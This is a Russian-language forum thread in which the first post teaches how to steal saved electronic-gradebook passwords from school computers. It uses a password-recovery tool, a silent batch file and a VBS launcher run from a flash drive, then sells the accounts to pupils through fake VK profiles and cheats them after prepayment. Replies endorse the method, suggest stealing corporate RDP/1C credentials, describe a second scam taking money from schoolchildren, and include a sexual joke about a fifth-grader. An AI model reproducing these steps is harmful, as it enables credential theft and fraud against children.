• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

После регистрации будут доступны основные разделы.

Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Заработок для школьников

UpperHackEZ

Участник
Реакции
6
0 руб.
Личный опыт! Краткое содержание : мы будем зарабатывать на продаже электронных дневников без риска для себя.
Что нам понадобится :
1) Немного смелости.
2) Свой пека.
3) Эта статья.
Начинаем. Первым делом мы должны скачать программу под названием DePassMicro. (она поможет нам раздобыть пароли от электронных дневников, показывает их, если они сохранены)
Вот ссылка : http://m.softportal.com/software-44206-depass-micro.html.
Далее мы должны сделать батник, который будет в автоматическом режиме сохранять пароли в текстовый документ. Вот команды, которые надо вписать :
@Echo off
"название программы" /silent/nm
Далее мы должны скрыть выполнение этого бат файла. Создаём файл .vbs и вписываем команды :
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "Путь до вашего батника" & Chr(34), 0
Set WshShell = Nothing
Готово! Для большой скрытности вы можете запихнуть в один архив с презентацией. После данных операций мы идём в школу и в подходящий момент (когда учитель выйдет из класса) вставляем флешку и запускаем файл .vbs , ждём, когда появится файл .txt, выдергиваем флешку и уходим.
Следом после этого мы запускаем Тор, покупаем фейковый аккаунт вк, далее по именам в электронном дневнике ищем их вк. Далее втюхиваем им наш товар, в подтверждение того, что он у вас есть, вы можете поставить ему оценку. После предоплаты, вы его кидаете. Занавес!) Я заработал на данной схеме за неделю 70000. Желаю и вам того же, до свидания.

Последнее редактирование:

trenoga2008

Участник
Реакции
14
0 руб.
Палец вверх! Хотя я сам уже пенсионер (а да! поэтому у меня фарфоровый глаз выпал от дизайна и под стол закатился. Смени пожалуйста эту ёбань зелёную с подчёркиванием!!), в школу попасть проблематично, но подход норм. Так много где из контор можно поживиться инфой. Пассы рдп/1с и т.д. и т.п.

UpperHackEZ

Участник
Реакции
6
0 руб.
Палец вверх! Хотя я сам уже пенсионер (а да! поэтому у меня фарфоровый глаз выпал от дизайна и под стол закатился. Смени пожалуйста эту ёбань зелёную с подчёркиванием!!), в школу попасть проблематично, но подход норм. Так много где из контор можно поживиться инфой. Пассы рдп/1с и т.д. и т.п.
Благодарю! Сейчас изменю)

Бастарди

Участник
Реакции
3
0 руб.
Ну прикольно, что сказать.
Особенно если у тебя есть знакомые с других шараг, которые за N-сумму ( Или за пивас после физры ) смогут сделать это за вас.

А потом крч создаём группу Вк, где делаем всё по красоте.
Дизайн там, расценки.
Приглашаем всех, кто указал в информации на странице школу, из который спиздили отметки.
Потом крч говорим, что мы кулхацкеры из США и взломали эл.журнал ваших школ, за N-сумму мы готовы изменить всем желающим их отметки.
В качестве Докв предоставляем скачанный где-нибудь Psd макет этого журнала, и говорим их отметки. Собираем со всех предоплату 100% в течении недели - полторы и говорим, что можем изменить всё только один раз, но изменять будет в течении месяца каждому. типа чтобы не спалится.

И тут все школьники в ахуе несут крч 500р за пять 5. И ждут с нетерпением. А вы собрали со всех бабосики и ведь X просто говорите, что журналы сменили тип шифрования и наша команда не в силе изменить отметки. Либо просто к хуям группу удаляете без лишних слов.

Итог : Вы отдыхаете на Мальдивах с пятиклассницей из параллели. А школьники остаются без пятихатки, а их одноклассники, которые не решились покупать отметки будут их троллить на протяжении года - двух.
Интересная схема)

И да, согласен с trenoga2008 - От такого дизайна я чуть суициднулся. ( Хотя я сам не лучше )

И ещё одно, если Вы ( Уважаемый мною коллега ) Из мухосранска, то увы, но у Вас нихуя не получится. Т.к у вас отметки выжигают вам на ебальнике паяльником.

Всем, кто дочитал до конца большое СПАСИБО. Люблю тебя, котик. :D

FreeScore

Местный
Реакции
113
0 руб.
Telegram
Зачем этот текст вырвиглазный?! Чем обычные. белые буквы не устраивают...

По теме, было уже нечто похожее на форуме.

UpperHackEZ

Участник
Реакции
6
0 руб.
Зачем этот текст вырвиглазный?! Чем обычные. белые буквы не устраивают...

По теме, было уже нечто похожее на форуме.
Прислушался к твоему мнению, просто люблю красочное), уже изменил!

gryz17

Местный
Реакции
107
0 руб.
Please note, if you want to make a deal with this user, that it is blocked.
И ещё одно, если Вы ( Уважаемый мною коллега ) Из мухосранска, то увы, но у Вас нихуя не получится. Т.к у вас отметки выжигают вам на ебальнике паяльником.

В больших городах как пример МСК, СПБ, Владик и т.п. ты не зайдёшь в школу, на тебя сразу 10 рыл налетит, да ещё и пару бабушек по мордасам надаёт. ( Сейчас с этим строго )

Бастарди

Участник
Реакции
3
0 руб.
В больших городах как пример МСК, СПБ, Владик и т.п. ты не зайдёшь в школу, на тебя сразу 10 рыл налетит, да ещё и пару бабушек по мордасам надаёт. ( Сейчас с этим строго )
Так я же писал в начале, что хорошо, если у тебя есть знакомый ( Который учится в этой шараге ), который все сделает за тебя

Сверху Снизу